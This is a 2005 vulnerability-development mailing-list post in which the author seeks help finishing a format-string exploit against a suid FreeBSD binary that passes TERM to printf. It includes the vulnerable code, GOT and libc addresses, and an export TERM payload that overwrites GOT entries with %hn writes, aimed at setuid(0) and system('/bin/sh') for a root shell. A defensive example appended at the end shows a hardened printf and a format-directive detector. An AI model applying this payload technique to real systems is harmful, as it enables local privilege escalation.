Vulnerability Development: Format Strings nonexec heap/stack

Format Strings nonexec heap/stack

From: Alex <alex00882007_at_gmail.com>
Date: Sun, 30 Jan 2005 01:04:43 -0500

Hello, this is my first post. I hope it's in the right list.

I am posting to get some help in developing an exploit for such a condition.

The environment:
FreeBSD machine, nonexec heap/stack. This is a suid binary, but is
not calling setuid().

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
        char *ptr;
        ptr = getenv("TERM");   /* attacker-controlled environment variable */
        if (ptr)
            printf(ptr);        /* format string bug: ptr is used as the format */
        printf("\n");
        exit(0);
}

objdump -R | grep printf
0804999c R_386_JUMP_SLOT printf
objdump -R | grep exit
080499b0 R_386_JUMP_SLOT exit

(gdb) p setuid
$1 = {<text variable, no debug info>} 0x280c1370 <setuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x28093a38 <system>

Using a format string it is possible to over-write the GOT entries for
printf() and exit().
I have been able to do so successfully. The problem is that it is not
enough to do just that, since it will become system("\n") or
system(0);

On FreeBSD, arguments are passed by pushing them onto the stack.
What I have been trying to do is this.

After rewriting the GOT entry for printf as that of setuid(), I want
to push a NULL byte onto the stack to call setuid(0);
The GOT entry for exit() has been replaced by that of system(). So
instead of pushing 0x0, I want to push a pointer to a "/bin/sh"
string.

Is this possible even? Or is there a better way of doing this?

To overwrite the GOT:
export TERM=` printf \
"\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
%.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn

where OFFSET = stackpop(?). Usually this is ~130, but it depends on how
your environment variables are set up.

I'm not sure what I would do next in order to change the values that
are being pushed. Could someone help me with this?
Received on Jan 30 2005
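An added example, not code from the original post, looking at the same bug from the defender's side: the posted pattern (untrusted TERM used as the printf format) beside a hardened form, plus a hypothetical has_format_directive() helper that flags environment values carrying conversion directives such as the positional "%130$hn" form the post relies on.

```c
#include <stdio.h>
#include <stdlib.h>

/* Vulnerable pattern from the post: the format string itself is untrusted,
 * so any "%n"/"%hn" directive in TERM becomes a write to memory. */
void echo_term_unsafe(const char *term)
{
    if (term)
        printf(term);           /* format string under attacker control */
    printf("\n");
}

/* Hardened form: a constant format string; user data is only an argument. */
void echo_term_safe(const char *term)
{
    if (term)
        printf("%s\n", term);
    else
        printf("\n");
}

/* Detection helper (hypothetical name, added here): returns 1 if s contains
 * any conversion directive, i.e. a '%' that is not escaped as "%%".
 * "100%%" is a plain percent sign, "%130$hn" and "%x%x%x" are flagged.
 * Useful for logging suspicious TERM values at a privilege boundary; it is
 * not a substitute for the fix above, since "%x" alone still leaks the stack. */
int has_format_directive(const char *s)
{
    if (!s)
        return 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* literal percent sign, skip the pair */
            p++;
            continue;
        }
        return 1;               /* any other conversion, positional or not */
    }
    return 0;
}

int main(void)
{
    /* constructed sample values, including the post's positional directive */
    const char *samples[] = { "xterm", "100%%", "%130$hn", "%x%x%x" };
    for (int i = 0; i < 4; i++)
        printf("%-8s -> %s\n", samples[i],
               has_format_directive(samples[i]) ? "directive" : "plain");
    echo_term_safe(getenv("TERM"));
    return 0;
}
```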
